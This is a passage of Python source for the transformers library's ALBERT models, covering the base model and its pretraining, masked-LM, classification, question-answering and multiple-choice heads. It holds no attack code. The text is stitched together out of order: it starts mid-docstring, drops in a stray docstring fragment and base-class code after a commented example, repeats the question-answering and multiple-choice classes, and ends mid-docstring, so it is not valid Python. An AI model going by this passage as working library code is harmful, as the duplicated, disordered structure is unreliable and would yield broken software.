and `span end logits`). """, ALBERT_START_DOCSTRING, ) class AlbertForQuestionAnswering(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.albert = AlbertModel(config, add_pooling_layer=False) self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=QuestionAnsweringModelOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, start_positions=None, end_positions=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" start_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for position (index) of the start of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. end_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for position (index) of the end of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. 
""" return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = outputs[0] logits = self.qa_outputs(sequence_output) start_logits, end_logits = logits.split(1, dim=-1) start_logits = start_logits.squeeze(-1).contiguous() end_logits = end_logits.squeeze(-1).contiguous() total_loss = None if start_positions is not None and end_positions is not None: # If we are on multi-GPU, split add a dimension if len(start_positions.size()) > 1: start_positions = start_positions.squeeze(-1) if len(end_positions.size()) > 1: end_positions = end_positions.squeeze(-1) # sometimes the start/end positions are outside our model inputs, we ignore these terms ignored_index = start_logits.size(1) start_positions = start_positions.clamp(0, ignored_index) end_positions = end_positions.clamp(0, ignored_index) loss_fct = CrossEntropyLoss(ignore_index=ignored_index) start_loss = loss_fct(start_logits, start_positions) end_loss = loss_fct(end_logits, end_positions) total_loss = (start_loss + end_loss) / 2 if not return_dict: output = (start_logits, end_logits) + outputs[2:] return ((total_loss,) + output) if total_loss is not None else output return QuestionAnsweringModelOutput( loss=total_loss, start_logits=start_logits, end_logits=end_logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a softmax) e.g. for RocStories/SWAG tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForMultipleChoice(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config) self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, 1) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=MultipleChoiceModelOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for computing the multiple choice classification loss. Indices should be in ``[0, ..., num_choices-1]`` where `num_choices` is the size of the second dimension of the input tensors. 
(see `input_ids` above) """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1] input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None position_ids = position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None inputs_embeds = ( inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1)) if inputs_embeds is not None else None ) outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) pooled_output = outputs[1] pooled_output = self.dropout(pooled_output) logits = self.classifier(pooled_output) reshaped_logits = logits.view(-1, num_choices) loss = None if labels is not None: loss_fct = CrossEntropyLoss() loss = loss_fct(reshaped_logits, labels) if not return_dict: output = (reshaped_logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return MultipleChoiceModelOutput( loss=loss, logits=reshaped_logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, )
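

# A minimal inference sketch for the masked-LM head defined above (an illustrative
# example, not part of the upstream module; it assumes the `transformers` package and
# the public "albert-base-v2" checkpoint are available). It mirrors the doctest style
# used in AlbertForPreTraining: fill in a [MASK] token with AlbertForMaskedLM.
#
#     >>> import torch
#     >>> from transformers import AlbertTokenizer, AlbertForMaskedLM
#     >>> tokenizer = AlbertTokenizer.from_pretrained("albert-base-v2")
#     >>> model = AlbertForMaskedLM.from_pretrained("albert-base-v2")
#     >>> inputs = tokenizer("The capital of France is [MASK].", return_tensors="pt")
#     >>> with torch.no_grad():
#     ...     logits = model(**inputs).logits
#     >>> mask_index = (inputs.input_ids == tokenizer.mask_token_id)[0].nonzero(as_tuple=True)[0]
#     >>> predicted_id = logits[0, mask_index].argmax(dim=-1)
#     >>> tokenizer.decode(predicted_id)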
""" config_class = AlbertConfig load_tf_weights = load_tf_weights_in_albert base_model_prefix = "albert" _keys_to_ignore_on_load_missing = [r"position_ids"] def _init_weights(self, module): """Initialize the weights.""" if isinstance(module, nn.Linear): # Slightly different from the TF version which uses truncated_normal for initialization # cf https://github.com/pytorch/pytorch/pull/5617 module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) if module.bias is not None: module.bias.data.zero_() elif isinstance(module, nn.Embedding): module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) if module.padding_idx is not None: module.weight.data[module.padding_idx].zero_() elif isinstance(module, nn.LayerNorm): module.bias.data.zero_() module.weight.data.fill_(1.0) @dataclass class AlbertForPreTrainingOutput(ModelOutput): """ Output type of :class:`~transformers.AlbertForPreTraining`. Args: loss (`optional`, returned when ``labels`` is provided, ``torch.FloatTensor`` of shape :obj:`(1,)`): Total loss as the sum of the masked language modeling loss and the next sequence prediction (classification) loss. prediction_logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`): Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax). sop_logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, 2)`): Prediction scores of the next sequence prediction (classification) head (scores of True/False continuation before SoftMax). hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``): Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of shape :obj:`(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus the initial embedding outputs. attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``): Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_heads, sequence_length, sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads. """ loss: Optional[torch.FloatTensor] = None prediction_logits: torch.FloatTensor = None sop_logits: torch.FloatTensor = None hidden_states: Optional[Tuple[torch.FloatTensor]] = None attentions: Optional[Tuple[torch.FloatTensor]] = None ALBERT_START_DOCSTRING = r""" This model inherits from :class:`~transformers.PreTrainedModel`. Check the superclass documentation for the generic methods the library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads etc.) This model is also a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`__ subclass. Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and behavior. Args: config (:class:`~transformers.AlbertConfig`): Model configuration class with all the parameters of the model. Initializing with a config file does not load the weights associated with the model, only the configuration. Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights. 
""" ALBERT_INPUTS_DOCSTRING = r""" Args: input_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`): Indices of input sequence tokens in the vocabulary. Indices can be obtained using :class:`~transformers.AlbertTokenizer`. See :meth:`transformers.PreTrainedTokenizer.__call__` and :meth:`transformers.PreTrainedTokenizer.encode` for details. `What are input IDs? <../glossary.html#input-ids>`__ attention_mask (:obj:`torch.FloatTensor` of shape :obj:`({0})`, `optional`): Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``: - 1 for tokens that are **not masked**, - 0 for tokens that are **masked**. `What are attention masks? <../glossary.html#attention-mask>`__ token_type_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`): Segment token indices to indicate first and second portions of the inputs. Indices are selected in ``[0, 1]``: - 0 corresponds to a `sentence A` token, - 1 corresponds to a `sentence B` token. `What are token type IDs? <../glossary.html#token-type-ids>`_ position_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`): Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0, config.max_position_embeddings - 1]``. `What are position IDs? <../glossary.html#position-ids>`_ head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`): Mask to nullify selected heads of the self-attention modules. Mask values selected in ``[0, 1]``: - 1 indicates the head is **not masked**, - 0 indicates the head is **masked**. inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`({0}, hidden_size)`, `optional`): Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation. This is useful if you want more control over how to convert :obj:`input_ids` indices into associated vectors than the model's internal embedding lookup matrix. output_attentions (:obj:`bool`, `optional`): Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned tensors for more detail. output_hidden_states (:obj:`bool`, `optional`): Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for more detail. return_dict (:obj:`bool`, `optional`): Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple. """ @add_start_docstrings( "The bare ALBERT Model transformer outputting raw hidden-states without any specific head on top.", ALBERT_START_DOCSTRING, ) class AlbertModel(AlbertPreTrainedModel): config_class = AlbertConfig base_model_prefix = "albert" def __init__(self, config, add_pooling_layer=True): super().__init__(config) self.config = config self.embeddings = AlbertEmbeddings(config) self.encoder = AlbertTransformer(config) if add_pooling_layer: self.pooler = nn.Linear(config.hidden_size, config.hidden_size) self.pooler_activation = nn.Tanh() else: self.pooler = None self.pooler_activation = None # Initialize weights and apply final processing self.post_init() def get_input_embeddings(self): return self.embeddings.word_embeddings def set_input_embeddings(self, value): self.embeddings.word_embeddings = value def _prune_heads(self, heads_to_prune): """ Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} ALBERT has a different architecture in that its layers are shared across groups, which then has inner groups. 
If an ALBERT model has 12 hidden layers and 2 hidden groups, with two inner groups, there is a total of 4 different layers. These layers are flattened: the indices [0,1] correspond to the two inner groups of the first hidden layer, while [2,3] correspond to the two inner groups of the second hidden layer. Any layer with in index other than [0,1,2,3] will result in an error. See base class PreTrainedModel for more information about head pruning """ for layer, heads in heads_to_prune.items(): group_idx = int(layer / self.config.inner_group_num) inner_group_idx = int(layer - group_idx * self.config.inner_group_num) self.encoder.albert_layer_groups[group_idx].albert_layers[inner_group_idx].attention.prune_heads(heads) @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=BaseModelOutputWithPooling, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions output_hidden_states = ( output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states ) return_dict = return_dict if return_dict is not None else self.config.use_return_dict if input_ids is not None and inputs_embeds is not None: raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time") elif input_ids is not None: input_shape = input_ids.size() elif inputs_embeds is not None: input_shape = inputs_embeds.size()[:-1] else: raise ValueError("You have to specify either input_ids or inputs_embeds") batch_size, seq_length = input_shape device = input_ids.device if input_ids is not None else inputs_embeds.device if attention_mask is None: attention_mask = torch.ones(input_shape, device=device) if token_type_ids is None: if hasattr(self.embeddings, "token_type_ids"): buffered_token_type_ids = self.embeddings.token_type_ids[:, :seq_length] buffered_token_type_ids_expanded = buffered_token_type_ids.expand(batch_size, seq_length) token_type_ids = buffered_token_type_ids_expanded else: token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device) extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2) extended_attention_mask = extended_attention_mask.to(dtype=self.dtype) # fp16 compatibility extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0 head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers) embedding_output = self.embeddings( input_ids, position_ids=position_ids, token_type_ids=token_type_ids, inputs_embeds=inputs_embeds ) encoder_outputs = self.encoder( embedding_output, extended_attention_mask, head_mask=head_mask, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = encoder_outputs[0] pooled_output = self.pooler_activation(self.pooler(sequence_output[:, 0])) if self.pooler is not None else None if not return_dict: return (sequence_output, pooled_output) + encoder_outputs[1:] return BaseModelOutputWithPooling( last_hidden_state=sequence_output, pooler_output=pooled_output, hidden_states=encoder_outputs.hidden_states, attentions=encoder_outputs.attentions, ) @add_start_docstrings( """ Albert Model with two heads on top as 
done during the pretraining: a `masked language modeling` head and a `sentence order prediction (classification)` head. """, ALBERT_START_DOCSTRING, ) class AlbertForPreTraining(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config) self.predictions = AlbertMLMHead(config) self.sop_classifier = AlbertSOPHead(config) # Initialize weights and apply final processing self.post_init() def get_output_embeddings(self): return self.predictions.decoder def set_output_embeddings(self, new_embeddings): self.predictions.decoder = new_embeddings def get_input_embeddings(self): return self.albert.embeddings.word_embeddings @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @replace_return_docstrings(output_type=AlbertForPreTrainingOutput, config_class=_CONFIG_FOR_DOC) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, sentence_order_label=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (``torch.LongTensor`` of shape ``(batch_size, sequence_length)``, `optional`): Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]`` sentence_order_label (``torch.LongTensor`` of shape ``(batch_size,)``, `optional`): Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair (see :obj:`input_ids` docstring) Indices should be in ``[0, 1]``. ``0`` indicates original order (sequence A, then sequence B), ``1`` indicates switched order (sequence B, then sequence A). 
Returns: Example:: >>> from transformers import AlbertTokenizer, AlbertForPreTraining >>> import torch >>> tokenizer = AlbertTokenizer.from_pretrained('albert-base-v2') >>> model = AlbertForPreTraining.from_pretrained('albert-base-v2') >>> input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1 >>> outputs = model(input_ids) >>> prediction_logits = outputs.prediction_logits >>> sop_logits = outputs.sop_logits """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output, pooled_output = outputs[:2] prediction_scores = self.predictions(sequence_output) sop_scores = self.sop_classifier(pooled_output) total_loss = None if labels is not None and sentence_order_label is not None: loss_fct = CrossEntropyLoss() masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1)) sentence_order_loss = loss_fct(sop_scores.view(-1, 2), sentence_order_label.view(-1)) total_loss = masked_lm_loss + sentence_order_loss if not return_dict: output = (prediction_scores, sop_scores) + outputs[2:] return ((total_loss,) + output) if total_loss is not None else output return AlbertForPreTrainingOutput( loss=total_loss, prediction_logits=prediction_scores, sop_logits=sop_scores, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) class AlbertMLMHead(nn.Module): def __init__(self, config): super().__init__() self.LayerNorm = nn.LayerNorm(config.embedding_size) self.bias = nn.Parameter(torch.zeros(config.vocab_size)) self.dense = nn.Linear(config.hidden_size, config.embedding_size) self.decoder = nn.Linear(config.embedding_size, config.vocab_size) self.activation = ACT2FN[config.hidden_act] self.decoder.bias = self.bias def forward(self, hidden_states): hidden_states = self.dense(hidden_states) hidden_states = self.activation(hidden_states) hidden_states = self.LayerNorm(hidden_states) hidden_states = self.decoder(hidden_states) prediction_scores = hidden_states return prediction_scores def _tie_weights(self): # To tie those two weights if they get disconnected (on TPU or when the bias is resized) self.bias = self.decoder.bias class AlbertSOPHead(nn.Module): def __init__(self, config): super().__init__() self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, config.num_labels) def forward(self, pooled_output): dropout_pooled_output = self.dropout(pooled_output) logits = self.classifier(dropout_pooled_output) return logits @add_start_docstrings( "Albert Model with a `language modeling` head on top.", ALBERT_START_DOCSTRING, ) class AlbertForMaskedLM(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config, add_pooling_layer=False) self.predictions = AlbertMLMHead(config) # Initialize weights and apply final processing self.post_init() def get_output_embeddings(self): return self.predictions.decoder def set_output_embeddings(self, new_embeddings): self.predictions.decoder = new_embeddings def get_input_embeddings(self): return self.albert.embeddings.word_embeddings 
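    # Note on the embedding accessors above: `get_output_embeddings`/`get_input_embeddings`
    # are the hooks the `PreTrainedModel` base class uses to tie the MLM decoder weights to
    # the input word embeddings (when `config.tie_word_embeddings` is enabled) and to keep
    # both matrices in sync when the vocabulary is resized via `resize_token_embeddings`.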
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=MaskedLMOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`): Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]`` """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_outputs = outputs[0] prediction_scores = self.predictions(sequence_outputs) masked_lm_loss = None if labels is not None: loss_fct = CrossEntropyLoss() masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1)) if not return_dict: output = (prediction_scores,) + outputs[2:] return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output return MaskedLMOutput( loss=masked_lm_loss, logits=prediction_scores, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model transformer with a sequence classification/regression head on top (a linear layer on top of the pooled output) e.g. for GLUE tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForSequenceClassification(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.config = config self.albert = AlbertModel(config) self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, self.config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=SequenceClassifierOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for computing the sequence classification/regression loss. Indices should be in ``[0, ..., config.num_labels - 1]``. If ``config.num_labels == 1`` a regression loss is computed (Mean-Square loss), If ``config.num_labels > 1`` a classification loss is computed (Cross-Entropy). 
""" return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) pooled_output = outputs[1] pooled_output = self.dropout(pooled_output) logits = self.classifier(pooled_output) loss = None if labels is not None: if self.config.problem_type is None: if self.num_labels == 1: self.config.problem_type = "regression" elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int): self.config.problem_type = "single_label_classification" else: self.config.problem_type = "multi_label_classification" if self.config.problem_type == "regression": loss_fct = MSELoss() if self.num_labels == 1: loss = loss_fct(logits.squeeze(), labels.squeeze()) else: loss = loss_fct(logits, labels) elif self.config.problem_type == "single_label_classification": loss_fct = CrossEntropyLoss() loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1)) elif self.config.problem_type == "multi_label_classification": loss_fct = BCEWithLogitsLoss() loss = loss_fct(logits, labels) if not return_dict: output = (logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return SequenceClassifierOutput( loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for Named-Entity-Recognition (NER) tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForTokenClassification(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.albert = AlbertModel(config, add_pooling_layer=False) classifier_dropout_prob = ( config.classifier_dropout_prob if config.classifier_dropout_prob is not None else config.hidden_dropout_prob ) self.dropout = nn.Dropout(classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, self.config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=TokenClassifierOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`): Labels for computing the token classification loss. Indices should be in ``[0, ..., config.num_labels - 1]``. 
""" return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = outputs[0] sequence_output = self.dropout(sequence_output) logits = self.classifier(sequence_output) loss = None if labels is not None: loss_fct = CrossEntropyLoss() # Only keep active parts of the loss if attention_mask is not None: active_loss = attention_mask.view(-1) == 1 active_logits = logits.view(-1, self.num_labels) active_labels = torch.where( active_loss, labels.view(-1), torch.tensor(loss_fct.ignore_index).type_as(labels) ) loss = loss_fct(active_logits, active_labels) else: loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1)) if not return_dict: output = (logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return TokenClassifierOutput( loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear layers on top of the hidden-states output to compute `span start logits` and `span end logits`). """, ALBERT_START_DOCSTRING, ) class AlbertForQuestionAnswering(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.albert = AlbertModel(config, add_pooling_layer=False) self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=QuestionAnsweringModelOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, start_positions=None, end_positions=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" start_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for position (index) of the start of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. end_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for position (index) of the end of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. 
""" return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = outputs[0] logits = self.qa_outputs(sequence_output) start_logits, end_logits = logits.split(1, dim=-1) start_logits = start_logits.squeeze(-1).contiguous() end_logits = end_logits.squeeze(-1).contiguous() total_loss = None if start_positions is not None and end_positions is not None: # If we are on multi-GPU, split add a dimension if len(start_positions.size()) > 1: start_positions = start_positions.squeeze(-1) if len(end_positions.size()) > 1: end_positions = end_positions.squeeze(-1) # sometimes the start/end positions are outside our model inputs, we ignore these terms ignored_index = start_logits.size(1) start_positions = start_positions.clamp(0, ignored_index) end_positions = end_positions.clamp(0, ignored_index) loss_fct = CrossEntropyLoss(ignore_index=ignored_index) start_loss = loss_fct(start_logits, start_positions) end_loss = loss_fct(end_logits, end_positions) total_loss = (start_loss + end_loss) / 2 if not return_dict: output = (start_logits, end_logits) + outputs[2:] return ((total_loss,) + output) if total_loss is not None else output return QuestionAnsweringModelOutput( loss=total_loss, start_logits=start_logits, end_logits=end_logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a softmax) e.g. for RocStories/SWAG tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForMultipleChoice(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config) self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, 1) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=MultipleChoiceModelOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for computing the multiple choice classification loss. Indices should be in ``[0, ..., num_choices-1]`` where `num_choices` is the size of the second dimension of the input tensors. 
